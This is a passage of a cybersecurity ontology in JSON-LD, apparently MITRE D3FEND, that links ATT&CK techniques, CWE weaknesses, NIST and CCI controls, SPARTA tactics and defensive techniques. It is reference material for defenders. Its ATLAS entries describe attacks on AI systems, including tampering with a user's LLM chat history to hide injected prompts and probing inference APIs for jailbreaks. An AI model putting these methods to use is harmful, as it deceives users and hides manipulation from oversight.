      "d3f:definition": "A slow symbolic link is any symbolic link on a Unix filesystem that is not a fast symbolic link; slow symlink is thus retroactively termed from fast symlink.  Slow symbolic links stored the symbolic link information as data in regular files.",
      "rdfs:label": "Slow Symbolic Link",
      "rdfs:seeAlso": {
        "@id": "http://dbpedia.org/resource/Symbolic_link#Storage_of_symbolic_links"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SymbolicLink"
        },
        {
          "@id": "d3f:UnixLink"
        }
      ],
      "skos:altLabel": "Slow Symlink"
    },
    {
      "@id": "d3f:T1081",
      "@type": "owl:Class",
      "d3f:attack-id": "T1081",
      "d3f:definition": "Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1552.001",
      "rdfs:label": "Credentials in Files",
      "rdfs:seeAlso": {
        "@id": "d3f:T1552.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:Reference-PrivateApplicationAccessWithBrowserIsolation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20210250333A1"
      },
      "d3f:kb-reference-of": {
        "@id": "d3f:Application-basedProcessIsolation"
      },
      "d3f:kb-reference-title": "Private application access with browser isolation",
      "rdfs:label": "Reference - Private application access with browser isolation"
    },
    {
      "@id": "d3f:T1091",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1091",
      "d3f:definition": "Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.",
      "d3f:executes": {
        "@id": "d3f:RemovableMediaDevice"
      },
      "rdfs:label": "Replication Through Removable Media",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InitialAccessTechnique"
        },
        {
          "@id": "d3f:LateralMovementTechnique"
        },
        {
          "@id": "_:Na4569d3982be46c39df7726a4b916c3c"
        }
      ]
    },
    {
      "@id": "_:Na4569d3982be46c39df7726a4b916c3c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RemovableMediaDevice"
      }
    },
    {
      "@id": "d3f:CWE-1258",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1258",
      "d3f:definition": "The hardware does not fully clear security-sensitive values, such as keys and intermediate values in cryptographic operations, when debug mode is entered.",
      "rdfs:label": "Exposure of Sensitive System Information Due to Uncleared Debug Information",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-200"
        },
        {
          "@id": "d3f:CWE-212"
        }
      ]
    },
    {
      "@id": "d3f:CWE-331",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-331",
      "d3f:definition": "The product uses an algorithm or scheme that produces insufficient entropy, leaving patterns or clusters of values that are more likely to occur than others.",
      "rdfs:label": "Insufficient Entropy",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-330"
      }
    },
    {
      "@id": "d3f:end",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "end",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-process-object-property"
      }
    },
    {
      "@id": "dcterms:description",
      "@type": "owl:AnnotationProperty"
    },
    {
      "@id": "d3f:T1521.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1521.001",
      "d3f:definition": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, Blowfish, and RC4.",
      "rdfs:label": "Symmetric Cryptography - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1521"
      },
      "skos:prefLabel": "Symmetric Cryptography"
    },
    {
      "@id": "d3f:ProjectedClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PC",
      "d3f:definition": "Projected clustering is a dimension reduction subspace clustering method.",
      "d3f:kb-article": "## References\nGeeksforGeeks. (n.d.). Projected Clustering in Data Analytics. [Link](https://www.geeksforgeeks.org/projected-clustering-in-data-analytics/)",
      "rdfs:label": "Projected Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:High-dimensionClustering"
      }
    },
    {
      "@id": "d3f:OperatingModeMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OperatingModeMonitoring"
      ],
      "d3f:d3fend-id": "D3-OMM",
      "d3f:definition": "Detects operating modes such as Program, Run, Remote, or Stop.",
      "d3f:kb-article": "## How it works\nMany OT Controllers have key switches to change the controller into various modes of operation. These modes of operation can include Program, Run, Remote, or Stop.\n\nThe key switch position is often available as a system diagnostic function block of the programming logic.\n\n## Considerations\n* It is advised to configure a key switch alarm such that an operator is alerted when the controller is put into a programming mode, as this could indicate unintentional or malicious changes to operational code.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-PLCKeySwitchMonitoring"
        },
        {
          "@id": "d3f:Reference-TRITONMalwareRemainsThreattoGlobalCriticalInfrastructureICS"
        }
      ],
      "d3f:monitors": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:label": "Operating Mode Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "_:N927a0c96f9d64de781d0fb7d5027949d"
        }
      ]
    },
    {
      "@id": "_:N927a0c96f9d64de781d0fb7d5027949d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:T1559.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1559.003",
      "d3f:definition": "Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)",
      "rdfs:label": "XPC Services",
      "rdfs:subClassOf": {
        "@id": "d3f:T1559"
      }
    },
    {
      "@id": "d3f:OTControllerOperatingMode",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The OT controller operating mode designates the specific, selectable state of an OT controller that delineates its operational behavior and governs access to engineering functions, commonly including Program, Run, Remote, Test, or Stop.",
      "d3f:synonym": "Keyswitch Position",
      "rdfs:label": "OT Controller Operating Mode",
      "rdfs:subClassOf": {
        "@id": "d3f:OperatingMode"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-6_10",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Least Privilege | Prohibit Non-privileged Users from Executing Privileged Functions",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "rdfs:label": "AC-6(10)"
    },
    {
      "@id": "d3f:DS0042",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Visual activity on the device that could alert the user to potentially malicious behavior.",
      "rdfs:comment": "This data source currently has no mappings to digital artifacts, but may be updated in future releases.",
      "rdfs:label": "User Interface (ATT&CK DS)"
    },
    {
      "@id": "d3f:Point-biserialCorrelationCoefficient",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PBCC",
      "d3f:definition": "The point biserial correlation coefficient (rpb) is a correlation coefficient used when one variable (e.g. Y) is dichotomous; Y can either be \"naturally\" dichotomous, like whether a coin lands heads or tails, or an artificially dichotomized variable.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Point-biserial correlation coefficient. [Link](https://en.wikipedia.org/wiki/Point-biserial_correlation_coefficient)",
      "rdfs:label": "Point-biserial Correlation Coefficient",
      "rdfs:subClassOf": {
        "@id": "d3f:Correlation"
      }
    },
    {
      "@id": "d3f:CWE-156",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-156",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as whitespace when they are sent to a downstream component.",
      "d3f:synonym": "White space",
      "rdfs:label": "Improper Neutralization of Whitespace",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:CCI-000196_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, for password-based authentication, stores only cryptographically-protected passwords.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000196"
    },
    {
      "@id": "d3f:CCI-000162_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects audit information from unauthorized access.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:CredentialHardening"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-22T00:00:00"
      },
      "rdfs:label": "CCI-000162"
    },
    {
      "@id": "d3f:CWE-922",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-922",
      "d3f:definition": "The product stores sensitive information without properly limiting read or write access by unauthorized actors.",
      "rdfs:label": "Insecure Storage of Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:CredentialAccessTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:Credential"
      },
      "d3f:enables": {
        "@id": "d3f:TA0006"
      },
      "d3f:may-access": {
        "@id": "d3f:PasswordFile"
      },
      "d3f:may-invoke": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "Credential Access Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N54eac1bf8c64455f92565792e9199926"
        },
        {
          "@id": "_:N3f5eca0e6b704601afc9f13693302f25"
        },
        {
          "@id": "_:Nf88f1d48f6c1446a9cbe336f83f44b32"
        },
        {
          "@id": "_:N1ae3ef89c61e495ba51d9d0e090c1301"
        }
      ]
    },
    {
      "@id": "_:N54eac1bf8c64455f92565792e9199926",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "_:N3f5eca0e6b704601afc9f13693302f25",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0006"
      }
    },
    {
      "@id": "_:Nf88f1d48f6c1446a9cbe336f83f44b32",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PasswordFile"
      }
    },
    {
      "@id": "_:N1ae3ef89c61e495ba51d9d0e090c1301",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:CommandAndControlTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to communicate with compromised systems to control them.",
      "d3f:enables": {
        "@id": "d3f:TA0011"
      },
      "rdfs:label": "Command and Control Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N3638b3db57504654924adb3556b3b625"
        }
      ]
    },
    {
      "@id": "_:N3638b3db57504654924adb3556b3b625",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0011"
      }
    },
    {
      "@id": "d3f:may-create",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-create y: The entity x may create the entity y; that is, 'x creates y' may be true.",
      "rdfs:label": "may-create",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:OSAPICreateThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that creates a new thread of execution within a process.",
      "d3f:invokes": {
        "@id": "d3f:CreateThread"
      },
      "rdfs:label": "OS API Create Thread",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N75c1ab66662b47719c344882fdd8d8de"
        }
      ]
    },
    {
      "@id": "_:N75c1ab66662b47719c344882fdd8d8de",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateThread"
      }
    },
    {
      "@id": "d3f:CreateProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": [
        "A process spawn refers to a function that loads and executes a new child process.The current process may wait for the child to terminate or may continue to execute asynchronously. Creating a new subprocess requires enough memory in which both the child process and the current program can execute. There is a family of spawn functions in DOS, inherited by Microsoft Windows. There is also a different family of spawn functions in an optional extension of the POSIX standards.  Fork-exec is another technique combining two Unix system calls, which can effect a process spawn.",
        "Creates a process.",
        "Executes a process."
      ],
      "d3f:executes": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Create Process",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Fork%E2%80%93exec"
        },
        {
          "@id": "dbr:Spawn_(computing)"
        },
        {
          "@id": "https://dbpedia.org/page/Fork%E2%80%93exec"
        },
        {
          "@id": "https://dbpedia.org/page/Spawn_(computing)"
        },
        {
          "@id": "https://docs.microsoft.com/en-us/windows/win32/procthread/creating-processes"
        },
        {
          "@id": "https://learn.microsoft.com/en-us/windows/win32/procthread/creating-processes"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N8f2df3bfb0534f959cec74d07097e066"
        }
      ],
      "skos:altLabel": [
        "Execute Process",
        "Process Spawn",
        "Spawn Process"
      ]
    },
    {
      "@id": "_:N8f2df3bfb0534f959cec74d07097e066",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:CCI-002364_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system displays an explicit logout message to users indicating the reliable termination of authenticated communications sessions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ProcessTermination"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-26T00:00:00"
      },
      "rdfs:label": "CCI-002364"
    },
    {
      "@id": "d3f:AssignPrivilegesToGroupEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where specific privileges or rights are granted to a group, enabling its members to perform actions or access resources as defined by the privileges.",
      "rdfs:label": "Assign Privileges to Group Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:GroupManagementEvent"
        },
        {
          "@id": "d3f:PermissionGrantingEvent"
        },
        {
          "@id": "_:N45308e29ad0f45569e72e94d8980f31b"
        }
      ]
    },
    {
      "@id": "_:N45308e29ad0f45569e72e94d8980f31b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GroupCreationEvent"
      }
    },
    {
      "@id": "d3f:analyzes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x analyzes y: The subject x breaks down object y into components or essential features, assessing y by quantitative methods, qualitative methods, or both.  Usually the analysis is done in terms of some model or framework.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00738221-v"
      },
      "rdfs:label": "analyzes",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:detects"
        }
      ]
    },
    {
      "@id": "d3f:CCI-002465_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system requests data origin authentication verification on the name/address resolution responses the system receives from authoritative sources.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002465"
    },
    {
      "@id": "d3f:M1033",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        }
      ],
      "rdfs:label": "Limit Software Installation"
    },
    {
      "@id": "d3f:T1579",
      "@type": "owl:Class",
      "d3f:attack-id": "T1579",
      "d3f:definition": "Adversaries may collect the keychain storage data from an iOS device to acquire credentials. Keychains are the built-in way for iOS to keep track of users' passwords and credentials for many services and features such as Wi-Fi passwords, websites, secure notes, certificates, private keys, and VPN credentials.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1634.001",
      "rdfs:label": "Keychain - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1634.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
      },
      "skos:prefLabel": "Keychain"
    },
    {
      "@id": "d3f:DE-0006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0006",
      "d3f:definition": "Threat actors may target whitelists on the spacecrafts as a means to execute and/or hide malicious processes/programs. Whitelisting is a common technique used on traditional IT systems but has also been used on spacecrafts. Whitelisting is used to prevent execution of unknown or potentially malicious software. However, this technique can be bypassed if not implemented correctly but threat actors may also simply attempt to modify the whitelist outright to ensure their malicious software will operate on the spacecraft that utilizes whitelisting.",
      "d3f:modifies": {
        "@id": "d3f:AccessControlConfiguration"
      },
      "rdfs:label": "Modify Whitelist - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0006/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTADefenseEvasionTechnique"
        },
        {
          "@id": "_:N2bfc86ed709a4892a2daa34404100121"
        }
      ],
      "skos:prefLabel": "Modify Whitelist"
    },
    {
      "@id": "_:N2bfc86ed709a4892a2daa34404100121",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "d3f:T1564.011",
      "@type": "owl:Class",
      "d3f:attack-id": "T1564.011",
      "d3f:definition": "Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process behavior. Command interpreters often include specific commands/flags that ignore errors and other hangups, such as when the user of the active session logs off.(Citation: Linux Signal Man)  These interrupt signals may also be used by defensive tools and/or analysts to pause or terminate specified running processes.",
      "rdfs:label": "Ignore Process Interrupts",
      "rdfs:subClassOf": {
        "@id": "d3f:T1564"
      }
    },
    {
      "@id": "d3f:CWE-1331",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1331",
      "d3f:definition": "The Network On Chip (NoC) does not isolate or incorrectly isolates its on-chip-fabric and internal resources such that they are shared between trusted and untrusted agents, creating timing channels.",
      "rdfs:label": "Improper Isolation of Shared Resources in Network On Chip (NoC)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-653"
        },
        {
          "@id": "d3f:CWE-668"
        }
      ]
    },
    {
      "@id": "d3f:CWE-821",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-821",
      "d3f:definition": "The product utilizes a shared resource in a concurrent manner, but it does not correctly synchronize access to the resource.",
      "rdfs:label": "Incorrect Synchronization",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-662"
      }
    },
    {
      "@id": "d3f:InitialAccessTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to get into your network.",
      "d3f:enables": {
        "@id": "d3f:TA0001"
      },
      "rdfs:label": "Initial Access Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N37c0b8c3332a4402b1644c117c281438"
        }
      ]
    },
    {
      "@id": "_:N37c0b8c3332a4402b1644c117c281438",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0001"
      }
    },
    {
      "@id": "d3f:CWE-127",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-127",
      "d3f:definition": "The product reads from a buffer using buffer access mechanisms such as indexes or pointers that reference memory locations prior to the targeted buffer.",
      "rdfs:label": "Buffer Under-read",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-125"
        },
        {
          "@id": "d3f:CWE-786"
        }
      ]
    },
    {
      "@id": "d3f:AML.T0040",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0040",
      "d3f:definition": "Adversaries may gain access to a model via legitimate access to the inference API.\nInference API access can be a source of information to the adversary ([Discover AI Model Ontology](/techniques/AML.T0013), [Discover AI Model Family](/techniques/AML.T0014)), a means of staging the attack ([Verify Attack](/techniques/AML.T0042), [Craft Adversarial Data](/techniques/AML.T0043)), or for introducing data to the target system for Impact ([Evade AI Model](/techniques/AML.T0015), [Erode AI Model Integrity](/techniques/AML.T0031)).\n\nMany systems rely on the same models provided via an inference API, which means they share the same vulnerabilities. This is especially true of foundation models which are prohibitively resource intensive to train. Adversaries may use their access to model APIs to identify vulnerabilities such as jailbreaks or hallucinations and then target applications that use the same models.",
      "rdfs:label": "AI Model Inference API Access - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0040"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASAIModelAccessTechnique"
      },
      "skos:prefLabel": "AI Model Inference API Access"
    },
    {
      "@id": "d3f:AML.T0092",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0092",
      "d3f:definition": "Adversaries may manipulate a user's large language model (LLM) chat history to cover the tracks of their malicious behavior. They may hide persistent changes they have made to the LLM's behavior, or obscure their attempts at discovering private information about the user.\n\nTo do so, adversaries may delete or edit existing messages or create new threads as part of their coverup. This is feasible if the adversary has the victim's authentication tokens for the backend LLM service or if they have direct access to the victim's chat interface.\n\nChat interfaces (especially desktop interfaces) often do not show the injected prompt for any ongoing chat, as they update chat history only once when initially opening it. This can help the adversary's manipulations go unnoticed by the victim.",
      "rdfs:label": "Manipulate User LLM Chat History - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0092"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Manipulate User LLM Chat History"
    },
    {
      "@id": "d3f:ST0003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SPARTATactic"
      ],
      "d3f:definition": "Threat actor is trying to get point of presence/command execution on the spacecraft.",
      "d3f:display-order": 3,
      "rdfs:label": "Initial Access - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/tactic/ST0003"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OffensiveTactic"
        },
        {
          "@id": "d3f:SPARTATactic"
        }
      ],
      "skos:prefLabel": "Initial Access"
    },
    {
      "@id": "d3f:DomainRegistrationTakedown",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DomainRegistrationTakedown"
      ],
      "d3f:d3fend-id": "D3-DRT",
      "d3f:definition": "The process of performing a takedown of the attacker's domain registration infrastructure.",
      "d3f:deletes": {
        "@id": "d3f:DomainRegistration"
      },
      "d3f:kb-article": "## How it works\n\nMost nameserver hosts and domain name registrars comply with internationally recognised standards and supply their services based on terms and conditions that provide users and organisations protection from abuse and trademark infringement. Performing a WHOIS query on the attacker's domain will provide a contact that can be notified in the case of abuse. Formal takedown processes should be initiated to suspend or disable the normal function of the domain name.\n\n## Considerations\n\n- Takedown notifications should clearly demonstrate (with evidence) that the nameserver or registrars Terms and Conditions have been breached.\n- Takedown processes are notoriously slow and sometimes unsuccessful.\n- Many government organisations will have takedown processes that should also be followed. They may use this for intelligence to assist other organisations suffering an attack.\n- Top level domain registrars will have takedown processes that can be followed, as an escalation path, when the nameserver host and/or registrar have not responded or complied timeously or inline with the TLD expectations.\n\n## Examples of Domain Registration Abuse\n\nAttackers will create infrastructure from which to carry out their operations and this may include registering domain names to be used in the various attacks. Known misuse cases include:\n\n- Registering domain names that are similar to the victim's. This is known as typosquatting or URL hijacking. Legitimate looking mails or URLs could be sent using this domain in phishing campaigns.\n- Registring domain names that are used in C2 beacons.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-UnderstandingtheDomainRegistrationBehaviorofSpammers"
      },
      "rdfs:label": "Domain Registration Takedown",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ObjectEviction"
        },
        {
          "@id": "_:Nd005c2757cad4256a73bdc895574e623"
        }
      ]
    },
    {
      "@id": "_:Nd005c2757cad4256a73bdc895574e623",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DomainRegistration"
      }
    },
    {
      "@id": "d3f:T1110.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:Password"
      },
      "d3f:attack-id": "T1110.003",
      "d3f:definition": "Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)",
      "d3f:may-create": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      },
      "d3f:modifies": {
        "@id": "d3f:AuthenticationLog"
      },
      "d3f:produces": {
        "@id": "d3f:Authentication"
      },
      "rdfs:label": "Password Spraying",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1110"
        },
        {
          "@id": "_:Ne2694d4c1e8c48fdbf2b9eac23cd4db2"
        },
        {
          "@id": "_:Nfab04cc48cb84fbb9e81e09759cfd447"
        },
        {
          "@id": "_:Na375354de51b4de5b5cc96cbd2c3dcf1"
        },
        {
          "@id": "_:N24176e145d4144b8ad97900277d1b45c"
        }
      ]
    },
    {
      "@id": "_:Ne2694d4c1e8c48fdbf2b9eac23cd4db2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Password"
      }
    },
    {
      "@id": "_:Nfab04cc48cb84fbb9e81e09759cfd447",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "_:Na375354de51b4de5b5cc96cbd2c3dcf1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationLog"
      }
    },
    {
      "@id": "_:N24176e145d4144b8ad97900277d1b45c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "d3f:CWE-515",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-515",
      "d3f:definition": "A covert storage channel transfers information through the setting of bits by one program and the reading of those bits by another. What distinguishes this case from that of ordinary operation is that the bits are used to convey encoded information.",
      "rdfs:label": "Covert Storage Channel",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-514"
      }
    },
    {
      "@id": "d3f:CWE-915",
      "@type": "owl:Class",
